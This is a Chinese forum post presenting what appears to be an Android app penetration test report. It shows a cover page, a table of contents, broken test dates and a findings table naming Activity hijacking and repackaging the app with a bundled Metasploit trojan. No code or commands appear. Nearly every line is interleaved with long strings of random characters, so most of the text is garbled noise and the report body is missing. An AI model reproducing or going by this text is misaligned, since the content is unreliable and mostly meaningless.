找回密码
 立即注册
查看: 5383|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
9 N: _7 n7 C7 j |5 X ; m2 b, m9 B7 x' o4 |' t

- E/ Z m3 C& \% _ & B* Y' M; j4 s& z1 |" L
7 {0 K5 }0 E0 c3 P4 m5 K & B- j' ^9 _: T. P- r. p* G) ]! [

2 u. j0 u0 h0 f2 j7 o( c5 M2 q$ v/ n0 ^ [
. [/ ~3 A! ]3 z( A. T& c6 w4 K2 }2 ^9 @ L% z- y& M

$ A) z9 Y$ J: w2 z4 r9 m; y) ^( _- Z, E+ L2 o6 Y 文档编号:                9 u3 [5 B8 h. ?! `3 U3 P9 v {# M' K) }: Z

9 d, }2 L' B) L: W, e$ i6 | * k9 A) f' b% k! T5 K

6 W# f2 d8 l" Z6 x$ g. @& o( K: H   . U, f* B) R* j& @7 l. m/ q & i5 s w( j8 t* y3 f+ N* U2 E0 T

# k! L! L1 F. S9 S: Z/ | & n0 @/ q6 B1 O

) l8 Q* ~; F/ ~ T1 F" ~2 Z , G% V" n, I. g2 R   ! o" B3 _# L6 s) @; W, u! H. i+ l + p1 N1 J% [$ C c$ x9 O6 ]% f

$ V9 H7 j. [6 W 2 t3 K" T: m# J. c5 d/ d4 O

6 e$ n Y5 y( V9 Q3 d. L9 [ J' |$ J! a2 O8 K   : }/ ~. d. X, |# s* U; A - R) Z; {4 }3 Z, M5 c

5 W' P6 U' p5 Y3 J* o. h# D5 ], m. } 9 @( z2 x, f( k3 {# F/ s

$ I* `6 D0 i k2 c - b, P: q! h, f+ u6 k$ h" u   * t+ q! ]; M3 e: R% x% n. }3 t9 V ; R7 O) c5 _8 l8 Z9 ^: r

3 l# i& A5 Y* W, e3 `2 m& t% e* M2 q& q# {5 c

% k1 k" L/ R ^+ `- i; f/ O+ m5 k ?( }8 }   / i+ q5 X1 D, O) t4 J! o T" T( B/ h& p9 A/ ~0 C* W1 |

/ O2 V, N- Z$ o4 o( X ( j$ b* D7 H [7 U4 o' h6 p& O8 e

# i- t7 Q9 S3 s1 y4 O# v; k& s ) y P6 q; y$ \ 某某某APP渗透测试 7 J$ p5 q6 ]2 e- z X4 X5 h7 |! S4 Y% w7 S7 {' s

$ n- T/ w2 c1 a 6 F2 ?/ H- ^& T8 t7 O

! m9 V) Q- Z9 p3 T, V* p, s$ g. s% x+ [8 A a9 h/ ^8 y/ E   1 I9 X( w: T, }3 c 9 a0 h9 ~ W0 s! F7 ]

* f5 v' R1 {0 u5 B0 [( z + K6 Z, c2 x9 R; ~' }

- R+ S' z6 B1 P* }: t3 |3 } 4 N8 T: t4 K0 @) r1 X   2 K# P: I6 x7 t 7 c$ Z* \5 F" n8 z9 @( p$ V0 T

5 d+ M" Y! l" ^9 J0 D/ v 3 ]( |( Q; A( n/ q' }9 @. z9 n

" P5 @$ l) B& }0 j7 E# [ & }% X6 q1 Z d! ~% _: h4 k8 Q+ J3 X   4 ]4 C3 ~) V& U \1 c3 L4 ~ 3 s+ B+ H7 v) b8 u; X

, @0 O* T5 R+ k, H, e/ k; @2 p! G9 k2 Z 3 ]6 t1 M1 F, h, M, ?

1 J7 |( N3 W" M& O2 ~( e) a# R) Q1 L. u   9 o+ E4 @) m' \5 P* ^% r3 z0 n4 U- ~! X! V- f/ y

5 a- R I# f3 s& w ; e; }# I. u. c0 K

1 A% j" M7 m# {: y, r & l0 { q7 T$ ]+ A& u2 f- d1 L2 @ 技 术 报 告 9 q+ u* M6 c0 s2 @6 r! a. l$ f6 V/ D' X% s% x8 u, A

0 t6 L. U9 ` W; n8 y0 w O 4 P* C1 ?9 x" b8 J% z: f" R! j9 c7 B

; S* X5 P' n. {+ {# ~1 N) {! Y0 z8 q- c; s   ! e+ S1 w, h4 d0 a 6 u, J1 A: X- d7 E5 l0 L! W h* k

; m3 O. n3 H9 ]0 p : @5 {' a @1 @4 G6 B

/ {* _# s' }. v- ]2 r e 8 g8 `: x3 A7 _! ^: L   2 A( V. E. H. k7 n- _: \; w$ n 2 [+ W7 D) {8 n+ Q. P4 j

+ T% N! f" v. r7 \. t ^ 8 [6 x* V8 D* n2 o8 Z+ n

% \6 t/ \- B9 U6 R- s. e' M+ e2 P. u; d5 t B" g   1 S0 Q6 [6 L) W X' |( _5 G; i) T' ?! w, g( q

4 u1 X/ p; T* I/ x! z# `' ?4 v, n# ^& Q0 t3 a( [$ X

' `( o* D# a# S7 w9 B( Y% |; r$ _1 f) y' a1 X% D) [: o7 m9 f   3 ~& ^" Z- C0 p8 S# W + n3 s' R4 Q G& E6 J

4 x3 o, c4 d0 p - n$ Z8 x& Q# W& P4 n9 L

8 D9 @ P% t% S % U# w @* Y u9 ~0 N4 x   " Z7 `1 s; H- H7 N8 z; [9 k6 ?; N- \' ]0 t4 ~

( z: _5 ?! p6 ^7 }/ I3 Y- V6 B7 @- A5 l+ E" D& d0 Z& U& p

8 }, g5 J: P% h , I, T3 x) M" a, \7 v; L0 y   8 A1 ^5 |+ V$ Y9 A1 S4 o3 Q - |3 O6 g# F5 C/ D; Q/ K

. ]. f2 X4 k+ _ L Z& Z% A& B3 d7 D( O( g/ c! O

2 V* b' V+ {3 R1 T) z . s. @! o+ S( U, W0 e- Z$ G7 q- ]   " `, O7 z; z! w4 c0 t8 T1 W1 W. {' J8 y' ?2 X. R: G

6 j7 c: c o4 C0 X( Z0 b 8 X7 S* O/ l8 Y7 H9 Z

% A! | Q/ m$ d, ^$ L: c3 S 0 G* m k& B5 e: A+ y" L2 _   2 K6 D' d+ q9 r 3 E; l" a) ? O4 G- G1 h) W: z8 | ~

6 l1 Y# V. T' N% s9 \. K% ~0 U( L0 D3 p e. O3 g

9 x3 w2 g: B0 d+ O4 u1 M W1 k. F% q+ K) r- l2 L% s0 z. K5 c   1 `5 Z6 P& a# T9 v/ _* Z, Z5 L 6 q. [4 D( q8 J O O7 f

: @3 i; z/ `2 S0 F) @+ _/ f W! K. j; a, Y# ]

* h. d$ X& C" C: z & v9 j% ]5 \& l" p9 x" F# a8 p! m   + ?8 X; o7 d/ s: m9 x2 T8 Z8 s+ Z # A2 _6 {5 k5 I5 ]( @/ ]

9 A3 E; O# S) x# w : E; _4 o) r! `' ~1 g: O

7 z. G" e3 j" T( X3 A; b% b# q0 e6 o2 e; W7 E+ H   3 V8 P" r1 h9 z; {) T2 a5 M " H; l( E$ v7 X5 G1 W

+ K. J3 E, t# C; a2 J( S- Y3 D4 u& y! q& a# @7 L) Y1 S( V: L3 V# e5 I

' K* o$ |! a: ?/ ]. o. j$ Q4 v0 U0 ^   & Q7 h7 K. j5 H0 s3 B ) J- K+ d% B/ [( F; z

% w) J5 a' n7 q3 D c% \6 W) E1 F- v! T

/ A7 S9 G7 P9 t$ O3 m8 Z ! ]6 P6 g" H7 V: m j# K   3 z* J1 w1 {) @' Q; `; K6 E 9 ?0 X: |# X. @( o6 n) ^0 t" f

9 f1 {8 z% g" V( Z2 q( B7 ` 4 c& s3 I, R8 c6 Q; P0 w9 W

! d1 k* a, E8 Y/ k5 l' q! K! H: P9 o3 f   7 m9 m6 s1 E; ]# u" v- p; Y I {9 w( r; F! |7 ]. @; L! J( c ?

1 }! N0 G7 t# n6 V # O2 u8 I- t/ g- ^% |

2 K) h$ r& v* v. L * @; O# H- R9 z; T0 r5 x! h4 S   ! S# T3 L& M& r$ p( x Q2 S+ B" n, @4 d. s3 ~

% s% o4 c4 `2 E 7 v9 `- l6 T5 C3 u! A& a9 V5 D

+ H" Y5 U, N' z; F3 S8 P1 `+ G . R7 ^& ]. L8 B   3 e$ j1 R4 k3 f3 {/ { 9 w6 [. n, S- t" u5 k

" \2 u( v3 w3 y" w/ Z' Z7 f! ~+ ~- F" X9 z8 i7 T- \. ^9 v9 c

* P4 d3 U6 `4 R8 `( Y! q/ v$ s6 D ! [" J. F5 v1 ^% i' I2 x, Z/ e   ) A" G! A; Q8 d! |' ~# K! {/ r& R0 _: d/ L+ N

4 p" C' w& H6 R' e; F- k; L 6 O' I6 [* X" X3 P3 ?( u. b. q5 U2 D

3 i- R! W3 R" B: U' c- Z8 O [% @( o M8 L* E5 X   , u3 H0 i0 n; _- u1 q, ?9 ^ i 7 n- [8 F/ p6 S# z# f. m7 w/ s+ H

% t+ S p/ \8 G3 _( T: x % n% F, |/ p0 F7 x0 d+ _! n4 H# r. s; C

) {) ?. Y2 [' |/ Q# L2 q: j 8 g2 Y0 b# @! u* g+ D+ I9 {) |( r 二〇二〇年 ; R+ @- @" T' t. X 1 R8 g; C6 e& I! L" z2 X9 ?

2 F- J; m* G7 d0 ?4 j! O: c " ^* H: l/ F& f1 k" H5 S% G9 E/ f
! P' q" |; y. l; T# E: [ + M' ^2 J; C5 s$ c) G1 [+ z# q ?* x
' T. f- K+ ^ j$ T - Q/ X. L! T' d7 s; }" Z; n
, J' z; i. A* G/ z/ l + {4 Y% B/ m) [: U8 n i* k4 [1 M
. w r K/ z" o7 J ' V; F0 j2 P3 l! K$ B( M1 d
, r- S" ~+ e) x* d! ?" ]7 P 4 F4 Z+ Z7 w( N- L5 ]+ y
. L. q! ]5 T1 F/ X * L" O! U% R# r& D- S) R
+ l9 {. a7 \$ h% b" U/ f% J1 S1 d * N& n0 ^- w8 P3 Q7 O3 n# |0 ]
, |; I" u9 Y6 ~+ }6 [. O' c4 X& b% s$ o& a) F% @ J- \

$ \7 j0 z2 I4 f# P8 }' x/ ] + w/ A. N" l1 G* \8 s: S! d 目 录 2 j7 B& x g* F J& ^7 q 6 }& j. T) m' M

# U: g" x5 ~ ? ) V- J! y' q* G8 a$ j0 s; H9 ~ + U1 _: F _ v/ U3 z/ u3 d 0 h9 X9 T3 u6 \2 H! D

& W3 p. O7 R5 G v) ]" |3 \' F1 a: d3 u. Q* e9 g" X+ u   0 W: }+ V: V6 U: k! W# }3 o2 M# d! G q! @9 M* ^

, S7 q) n: J0 a6 N1 j. R1 c. d' |- P1 w6 M' w% L

% ~* r a0 Y, z4 ^4 p* D9 Y 0 K# i! r1 [! Z. y" ?& I 1 概述... 3 # F* a0 M0 H/ B' j o: h' T9 b8 I * n" w2 {! Y2 d# ^/ [

9 O& s, K$ p) N& U5 O5 u% I, j- A! _! i : V5 x, ^$ {& M; [

+ c+ h6 ~& m' c8 e% O 1 |+ K+ q% o$ ?4 d+ h/ U4 i 1.2测试时间... 3 ! W) |6 }2 l% @, s 4 E/ ^* Q3 a9 O9 ~8 g3 b# h% v

( w+ L# P, b9 b6 M# z: a 0 W; ~6 r3 k1 S. }) C: S

' P' S* H9 X) T* k ( t8 j7 r. A- G 1.3测试对象... 3 : a% E: p' f# m+ h1 f$ h/ a% x# D }) q

" U& |& [5 C" D5 M& J, C 4 F3 S: }, @- E1 H+ F4 e8 q" _

9 u u. z& F& K" P$ q& Q0 x; O2 D" i 1.4测试结果... 3 , H, m/ n! t, R) p: i+ M0 _$ P9 D% u* t1 R

9 A- n% T! p, I! k" p' w1 t% C4 C ; L _9 N7 E6 F! K3 v" a

% `6 A: F1 [6 g5 W. R 3 ^$ d4 k4 ?3 H% }: k2 G! t 2 检测结果... 4 $ w+ K- s I; } H' R5 A % P& O" u4 e( R& W

: F8 X2 W" p _! m9 B , C; b" Z( v1 j0 G. w7 o

/ f* ]" |) Z; h + o* O9 M+ e3 s0 }; v 2.1 某某某... 4 8 v) L. D d" w' Y ' n* e0 J2 I7 V) b X1 `6 j" G# U/ p% O% f

: k' x4 t! C: `' g2 J& U! Z. Q. V: c1 V" k/ @' N

9 [7 |1 }0 [0 {5 T: V: s& r/ D4 { H3 ~& f. o7 ~5 Y0 {( n6 ^. @ 2.1.1检测目标... 4 C% Q/ \7 u. D6 f3 t+ K& I3 t6 [: Q" \; V* V! }

; o$ R$ J2 O: _1 ?+ v & C0 {# k% b, W4 m& W

$ D1 m( I N, P * G" s, ?8 e/ T3 D- p4 g5 E6 {0 H 2.1.2检测结果... 4 / C3 \8 K( F9 ~* X 9 F" V! D1 c) j1 e% S! Q5 n6 k7 W# J. b

% {8 a3 E6 O% X2 E ' L, o9 N {: s0 G1 F: P* ]

; j7 V2 t. m5 I7 O% w) f( w) U$ D6 m, b* @, k+ a. g 2.1.2.1. 4 : E3 |* C( @* O* F7 g: r' c 8 x2 \4 @" Z5 `. V

7 }+ a! o) K t0 u1 e; v/ X& l- V! Y E5 k

0 m! O7 S; n+ x( T , f1 o7 V8 d! m" E 2.1.2.2. 6 1 l, x6 a* I8 O 1 Y$ ?& g" c2 d. A% c U

- A( q3 S* R# z , ^# P* J3 ^& Q5 m' T8 c/ j, C

- I! ~% t% d$ q6 X$ C1 {8 C+ ?: p( K6 ?! ^, p8 O8 j 9 M: f# i* w6 V% @$ t8 T, o8 z" N* [; n9 R" c' I2 j; t

1 @, W. L; N0 b$ }' n) A ' u0 F' }+ J* B) E1 B% ~ D
8 u! J$ a8 y8 o7 l |. P 1 {4 z$ L) E) x# A, f! ^9 ]
( s- T" C4 B, |* i4 x* o: w* S' Y* N& o; Y% R
1 Y, M u1 T$ A / n% f: [3 g( I1 z2 o6 }( }
. i# q' Y3 h) a* K 4 I# D- b9 c( P: i

* b4 t' P: l, W9 g) h; ]( T & w5 l# O$ L. L: d4 D( E1 A 1 概述 2 l; E2 m' J; j7 e6 U# H9 v # K6 Y% V2 ^4 a# I) U

" A* j# m- t; I. i# S# G2 K1 W: J$ }+ g+ X1 L

6 v! u5 N$ U, X; D. W% H m0 _$ e. ^# A2 q. r* p 1.2测试时间 . U- F) Y) B8 a: K & `. G' }: i9 G: j4 ]& j

7 `3 G4 Y/ u% A# @6 G$ d - W* ^( U& B/ {+ `! T0 W : L7 ^4 L, q1 }0 K4 X* W$ w% F: t5 i9 L, ^- T, b- j6 X3 R0 [/ e1 R; Z* o! B* J t. o, e9 X3 k' E5 ]5 e8 i, B9 P7 t' L7 d9 O" f" n5 M9 a1 i& {6 S6 n3 K% a/ F/ \ _& o+ w9 \! w. V' [, o: E7 w0 d+ i$ e9 z w n- d$ c) i n! d* _; X. u$ I" ?6 n0 W P) |: ?# R' S; j& D+ A, M$ d _$ \# q1 ^5 n8 E$ n/ S4 b" C* k G0 y' q% x3 C: Y @) B/ x, v3 P- S* h( a( j+ I* m# K. ~0 S8 y: D8 u) M1 A, V9 Y1 i$ Q+ r; a5 L7 a9 M# C% ~, r9 t# K: t5 u* W0 L0 j \. A# Z8 e% i4 ~$ l1 ~, `8 s8 {& P3 N, t. N3 ? ~+ u8 d* m& K6 f/ i# _ ]! c) z$ @& l8 w0 ] C- s: C1 r1 {2 y' O" e# I% r( g) M: h4 W6 o4 M9 C8 L: I; [9 S3 k2 c% u+ t+ {, `$ O8 G. x8 i9 Y) g% W7 d# k/ E+ w- G# H& I1 ], X* m- o- _
9 u8 g- x6 {$ D. o1 `8 c: ?: t9 U" c. C3 K. l* h9 }

# X- D4 X9 _' M/ E2 B) l! Z8 Z7 C" S+ X- m9 S 渗透测试时间 - Q5 a1 @7 m8 d7 t9 X6 \2 r- U( \ $ {, R! e. h0 B1 f

/ y* }- V& i2 t, {& D% ~2 q" k2 k) ~3 {6 z2 t& a# Q
0 H4 R3 h9 n! Y3 i8 N2 A% u D* X, ~ ' J" Y% R9 e8 {5 }" v

# }# S% {! b* @3 b* E( Y7 g& q + S1 E; f* [& M 起始时间 % ^; z8 C' i( T6 p$ x 5 x d; r. _2 s

" t# o( W7 p$ W/ X9 N) R 6 ~; E- X, M9 m5 W2 g% G
4 W! \3 f) @" u! F' o* n. ^: Y6 z

0 R# x! F u/ R% G& r& M5 d1 b( J$ c4 C! |! D 202046 , R' h! c3 e# \9 ?% R ) R; s( `4 c. u5 u; B1 W, {

- L- h, K0 X6 D/ i! g+ p F: }% C. t1 f
2 P G% H3 ^3 I . r( I/ ^) a. @. l& u3 `' Q0 Z1 ]* b( ?: @8 {

6 L8 \; j8 V3 y( `6 k( L $ K1 X$ `2 w: s. U% ?* C* c" j 结束时间 + D! Z) N+ K2 z4 K% ^, | * s5 Q. l; i- z# k

b# Q( |; _ ^ _/ l5 A3 t , `; |( G& U- x* S
4 l! \' v6 g8 M( E8 q& y3 [* d, e; L# D; O+ ^

8 R4 f; W3 F/ c( d % w4 D& N! G9 q, } 202049 ' s- Y" g' [7 y8 ~; o W# ]1 E0 F- H8 Q- b) S6 r

* ^3 u7 z5 |" s2 M/ J- y7 o+ D5 N( r. D# K9 K+ e4 S5 U8 D' V
& k1 E# x6 b t! L8 C- d, {2 w7 _ ( h. V/ A; A# u; }( P: N5 P# ]

$ E% K: k' T" L( F, l2 | ) J4 k6 Q7 @4 F4 S# z 1.3测试对象 8 g1 z; o" @. v& a6 s* z & Q" l9 b; a% e) D$ u& G( y

9 s6 l; M* d4 M! z+ Z" f5 y4 W" G ) k7 i/ y, j+ r+ d

& d3 [& a2 l- a: f- T1 `7 w8 {# w4 p6 d 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: : @$ s2 v4 b; H- R / Q7 p$ R* W o/ e5 z( Y

* J9 {% b9 L+ c- K. z5 k+ z$ c# l4 f* d t& \1 o, P

' V/ t4 N$ t9 R, `# |! X3 d6 R " l6 @7 T0 V$ M0 d0 e 1-1 检测对象 4 ]. ?# N& ]2 p/ }+ Q; T+ j+ J& l. t& e& J k! `" t

6 g( L. j5 o7 r4 }# m ( \" m5 F Y% L8 e& | ' c( X1 F: o6 J; O1 d- |, V6 A9 `5 @: @: H5 j2 t+ s6 r7 f; |' |5 }3 X3 Q* X) k8 s0 ]' ]9 L, Z, _4 _2 `. C X" ~2 X# w3 \2 l0 k, S2 {+ L8 `0 }0 e# m) f% w1 U3 j! M S# m. k* b4 P& O! l) g9 Y2 R3 X. @" V$ c7 a: w: P: z R8 X w) p1 n, Y* j. U: I5 W0 z. j/ g; v6 Q* k/ Z3 n7 W) [6 a- L( r x& Y9 @4 D1 t/ V( D* H/ B, e- a1 s) f7 ]' p" W* o- H+ c/ x- {. s( j/ |2 l; m1 j1 T, {6 b4 { J: s7 _) U7 }. k: j5 a' Q s" A) S+ B5 N, a: W2 A2 e( f# b2 u, E3 ` D: V$ | F& S) Q4 _; t) s- [4 H+ z/ I p# x/ a1 o8 h7 V& W7 \8 u5 I* _8 e+ {) q" J! N3 Y! R L1 x5 M# N: h% t% D; D* D0 x6 a! d- V" J- J) Y/ J+ u" \% _: C5 b$ O0 |2 M$ `4 J( Z- c( j4 K; r* n) U: e g# p! [7 G' u9 A6 I( P
% E+ h6 |7 b" u( y8 c& T' ^ ( d# H# ~' t) R, W

3 r! B2 p- Q( r8 h% p! W 8 |) ]0 A) [% r 序号 4 [& k- s* v+ t! u$ U+ }; W) ] ) ]6 z/ d8 f7 y: W/ a: P

( ^7 x( s1 ?/ N- \- g# h2 W7 J( X $ A( \! u* n( ?9 F( |7 y2 m* x
" b |7 \$ ]) f( Z2 h7 a" N+ Y1 f, P8 z7 @" t _; v

) E0 S# k: P U, J6 U. p , R2 U8 j9 y8 v g% C5 u! @: w 测试对象 5 v3 U$ W4 P! m# @ P6 r& H$ L: G# f) m4 W3 ]$ y* ~

; B0 d: Z! v- i% E% H % x) L, F% l" f7 r1 L" H
2 O$ W" K8 \: z 7 ~& |9 o9 l7 f% }+ S

+ s' H. `& `* W$ c3 X' \ h 7 W& c" U3 o/ b7 q$ k1 B0 @ 测试地址 % k- R4 ?. S- i$ F- Y4 F$ U8 H; a7 R7 P; |

* ^' [9 W4 Z0 T& a7 R # a4 a/ Y5 ^% N7 z% d, x( i
% k1 ^+ o" @1 ]$ P # z8 j: E, S$ e% [( C( ?# X" J

- e/ u7 A5 a( s ! G4 p3 j' N5 H/ n2 w' N 安全漏洞 + r8 s& F( H4 a ' i+ l0 D$ j( p* |2 P" M- g

) D& S' U( f- \ 5 ^# a! Q" y' c) Z! A! s
% r6 L, v' {' v" ]/ b g8 t$ } 8 b6 n/ ^* s1 |5 d% \. ?

; n# w# k' Q. A1 r, ] 4 E6 a5 k6 O" o }2 C2 d% U 1 / A% \' n- B2 o( u 5 n0 U/ ~1 d, k- G

& Y6 o' w% b; [6 j0 F. V# h : v+ R/ T) Z6 \
R( I. E* E7 B/ @+ k ?3 G% K2 G3 }& [8 [

9 h1 z( [3 P4 K3 V! j, f ! E/ v8 ]! y- H: b 某某某安卓APP & U* Z; ^ ~! R H3 ^0 Q' ]: w 2 m( b) Q$ I9 v' @

' [$ \- \ o7 y, V+ N1 w * o& [0 `) q6 C& b5 `, t4 V
3 {0 J k" G% a- Z + {0 y( U! V* [" U6 B

/ E! `- H! Z! U# {0 O1 \' i* v7 X7 K8 t3 Q, l" S- [   % a- W, F9 y/ z: q / d' }; B0 \% E1 O( ]0 H0 g

! h3 c+ [. [+ @3 r5 B! r, v 5 w( c# i4 s; y) s
. v+ R5 G! q \: `8 G: s 9 U/ ^! Y1 [# \& `9 a

# n/ m( c4 T1 j3 a" L$ m, h) [. } 2 ?" E: ~( J3 E! r 2 - C! `2 R: s. ^, C# n2 |* D' x/ e' U ; [- U {& Z6 t

, ?- G0 Y4 m4 q% \1 T 1 K1 L! B4 z1 Q" e' e, S y, M; g
" g" T, z3 h) l 0 z, A; ^0 W5 ]6 }

2 q1 f% ` H% H+ y 4 u* v0 |5 U) n2 N' A+ g 1.4测试结果 7 V" ]1 S7 V. L+ \- ~ 8 y) Y- p5 L6 M/ D9 V: p" T! X

6 B+ I, V. l! q1 a$ P$ } 5 i# @" K, C8 B+ l4 v

2 U' ? ^: @* R3 }( `# j! l" t$ h8 q * m' ^% |% B" D [& ~; d 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: * X K, i4 n, w0 c% { / M! T$ Z8 p1 s8 }

7 T2 f/ m+ e: G; G* E4 o 2 I7 X. g" b6 _

( ^4 h4 Z" ?9 m4 f% ~: t$ y2 V) {) |* X3 _! t5 c" u0 ^   6 t2 o( W7 H8 j- r8 C& V8 i; L - L9 p( B1 s: E+ v

' z+ c+ W' a& j$ k! _ 3 C$ h% N& U4 M4 D0 R- g
8 C9 \* i* K0 i+ i% |2 u6 M 7 E5 F$ m1 Q2 \+ `( I 6 C. J9 N3 K. ?! R/ W e2 \4 F2 b; g6 k+ t: o- @6 P1 e% k) G5 f) I2 B7 ~) B/ v- d3 w% ^! Y* V, Y9 x& `" ?4 |% o- T) c3 z5 t1 _0 t9 l4 t6 \$ p% L. h- V# h' t3 T$ R7 U' ]/ R% b, n v9 M! H" l: D; j) V4 g. k" m% \+ }1 C! T: c* X: m/ |. G( v3 `- A$ X( Z# _! v* Q! i6 S! \( A2 a C5 A) ]- g( S* l9 N) m- \; M+ ]: x4 f$ {, c+ l4 l f- I, o* \& N: M4 c% R& A- Q ?% {$ n0 a3 {8 Y# l4 y! U- x! l1 s; O( p* O! X5 t+ B* ]& L C8 b8 C- M; W) Q" q& w4 t: j& N7 g" P/ B8 _5 m# v7 }" s/ t# w! K% @; d6 _6 J9 ]% m# h7 B* Q, |) q1 s/ [0 s# q' E7 u1 v! K( |5 b; H- e3 E' i% `3 Q5 [- O I$ Y* H6 m5 A0 b" Q& |) j, j5 J/ S' s* g- Z3 n! G N: R7 J2 \# u8 m3 R) V8 {1 y, o/ ^* r" E* F4 `( Q5 V# L* _! m$ h3 T0 |6 s) b# G' G. A F+ U2 m8 @- O' G2 L! c3 K& u( {7 f8 c: x9 V( ]2 Y3 L" U+ M/ s4 Y- D5 G) h' q ]1 ~- ^; ~$ X7 q! h4 ~4 ~7 n0 [/ g7 u) K! ~" V6 a/ R& f# s' G, W& @' Q4 e9 [! J) I/ P7 e/ K" y. l0 A) D1 o: A( ?+ T/ @ }- E5 }2 k4 Q# Y6 f$ r. A, G4 _+ b7 |8 _7 r! T/ r6 c% C3 p9 p- F, o" g$ e. a, G; B4 W- L. y' T# I) s& q7 A5 A" z4 c' S8 @0 |3 Q$ z4 S$ a8 h% b# @/ N9 G" j& o( a: O+ {! Q+ y! r5 O% Y+ D& E# A6 A1 i1 L3 k3 ]
9 U5 M5 m* P, E6 L* L$ D% L. a( K6 f* y: |6 y

L5 J" p. ?( ]9 I/ A* d ( |. J+ S! V3 |6 j" Y% A% k 序号 - U: T! X/ P1 [% [& A, ?! G 6 o4 l) C4 W3 S( l4 q# \# W

$ F0 n( ^8 }$ M& K1 u" W' k $ E! N: V- L. w- m7 I9 e
5 d; L; D9 |; K: M ; L$ t, M3 r! D: n% j* a" @

6 Q' b, E" x: E: H- l8 A( g" K/ r: t4 ], w 系统名称 $ `" c5 ^" E1 I; ~. v; ?( n0 T b- n9 g/ U* ~ W4 k; w6 o7 N

$ Y: F& j9 M P- M6 @* J M5 o$ } {0 r
2 }: C. r+ z* d% D2 b " Q/ L; P: y e( b. h+ b

; L1 y7 L. u+ _ O5 V + q( P9 n) Z Q 漏洞名称 c% {8 w9 G6 ?; E' f3 ] ' F5 f0 b, f0 Q) {$ l+ K) f9 h7 W

$ c+ D, B+ J; E2 B0 F / X; c4 F; K; Z( d3 F
% N4 j4 T0 \1 S1 o. ?+ o: U# p/ A: i6 ]$ U4 N

G+ o/ }* y. I- v% ^ & Y6 E L& P \) [ 漏洞危害 ' K6 g1 D$ F: g6 L1 E3 T0 v/ H7 E1 k9 v: q0 {2 P7 ~; s

0 L4 E! O+ q2 @, k8 |# N 4 t8 ]2 {# ^" {) S2 z3 W$ N
! Q, B9 o0 I3 r2 G) n) | 9 ?3 ^2 M1 [* T. M* z. Q

3 h, o; S9 G0 x # t, W, A/ L* S" J8 h 修复结果 0 {2 s/ d) e5 j. X$ C! f, ^$ G1 N+ j! L0 [" @0 r' d4 K

8 ?% H' L; }7 G1 ]! Z 1 I* i1 |3 E! ^6 W
; _$ e8 L9 X6 H; _& g! [9 v n5 n' U+ `- g' m( b5 `0 P( n

. U2 K$ q- h; r1 S 1 Q+ |2 A3 s7 a4 b& A2 V 1 . P; p" M! P2 e8 X9 T6 u * W" C$ s% t$ |! g+ m. v

5 U. [9 x4 y8 ]. b0 {/ Z$ Q; J4 L/ m# t, c% b! m9 o
2 U A- l% _4 K3 R. X$ |( T 8 b) P1 ~ U$ S# e

1 b" Z2 ]! q# ]; `3 @ - X; f; |6 J' L$ l) }+ L 某某某某某某APP / s! H' z% V+ O. c # H; S) U) C4 U6 _& }2 h* `0 z1 z- F

2 c( A, W: c3 T7 H) G2 L " E2 H# R; ` E" e$ [
! r3 q( w5 \: S; ~& n0 ?. ?9 J . U ^) m+ e- x0 [: T6 A

, X" `1 ]7 A/ `+ P) g7 z3 w 2 i* ]( x9 }# }7 d9 n5 H Activity 劫持 8 G( o+ L) X7 k4 z ! ^! Z; O/ M# d# Z

; N' [2 x: S. x6 |( J- V$ r6 b, u& @) E& ?9 ]% O

$ Q# T& a$ i1 w) `! d7 n- h, q 7 g& J5 \7 n+ r6 j- Q7 d   1 v- H6 J& n- T! u7 g3 ` $ H9 X }' q% `. [* u( K9 U& L7 d

8 B7 }& S& X0 E2 E8 ]; _1 m& ~ ) k. H9 b& }7 w) E+ k. Z% l8 }
8 R8 w/ O/ Y% I# M V( f! H& A + g% y# i- L# ^4 Y

) U) f- x; {, M$ q7 x2 @ 3 C! c% J4 D" y- M: x 3 ^6 {" v. @& j& q% H# E' X/ T! g# _ 4 u1 e7 k' T! A) {! ?

/ D, h+ I* s! q# ]% V R- W) c' ^& w7 ~0 h2 o, ], U" g
# T9 t0 j/ }4 Y0 b8 B, ]- n 4 t- J# B5 N3 _2 n6 y0 t% x8 ?

, s4 e w8 R- U1 S) \+ w. ?5 X7 ^, q# P; c) o0 m   $ N2 `9 T6 c" v9 ~ & O3 U7 b7 z4 P

, w$ L. k. r& |0 I- O3 O7 |& [ v/ i5 |0 \& r: [% _/ E3 h: F
) E8 Z/ V" P' f' F ) ?* J. c! v0 D; k/ ]

$ Q& r) Q/ {( g# U6 {: V* U ) z0 ~7 H% |; _% c7 }& Y 2 " }& A) z& d% J: |- r( p 3 m: D9 n# B% x7 Y5 y

( N: x& Q% L2 L* `! ~& @& `. A# d 1 a$ @" M) } d; ?0 m) [
7 L* _0 t, c% v. \ 4 s3 [! u3 w [, f) f

$ g; @1 f) I5 `1 S- M( q( [% H( N $ W5 q0 N$ A) Q: _: o6 T9 i: z$ T1 q 某某某某某某APP 6 G/ Y6 ]0 b/ _ R5 \3 w 3 e$ \3 X/ l( P" b& X& I: p

: f: o4 |2 H# Q4 P " h, e3 W' M- F% P) o, ^. V. r4 a- V* d
7 Z. D2 ^) |9 C 9 z' m% I+ @& X" s. P. @7 x# h# y

4 i! I- ^! ~ A k) H1 u) O* Z5 |4 J 反编译二次打包捆绑木马、篡改APP代码 " P$ j: I& }( O( p* q& B" G% O. ~7 a; l5 h1 W

# {! I* k9 h, p$ l$ T7 A2 o' B+ ]8 o2 Q& N/ o( r% @
7 } s$ m4 q- ~& w2 k 2 Y" i* t5 ?. S; V! ^) S# Z

5 m7 @5 t) O$ P' u2 {8 K: c2 H- G1 A" h : t- k. G' G7 u( Q! ?6 b4 ~& |/ v7 A% c! N+ q }) }" N6 u

+ F: }1 o7 _: s. Y$ k/ \ - f' P# d, X6 C, W! e# u
8 x& C# b0 C( K2 N; ~' @' O* u6 V" } 1 ^5 T* k/ a/ C) I" P4 X* g

! U6 L) }) w% n$ i: W4 H + b( z1 ~& E S d* Q" R& g   ~. u: j; M, ?* w1 x" W( r' j , @! {7 A" N' b$ |/ N, |

9 N/ j6 e3 I9 ^2 ] 2 n+ y- x2 T7 t+ w! G" ]2 y1 M
# F8 `$ T! y: i; L. F 4 ~! W6 ?! B, w2 T3 u+ G- i
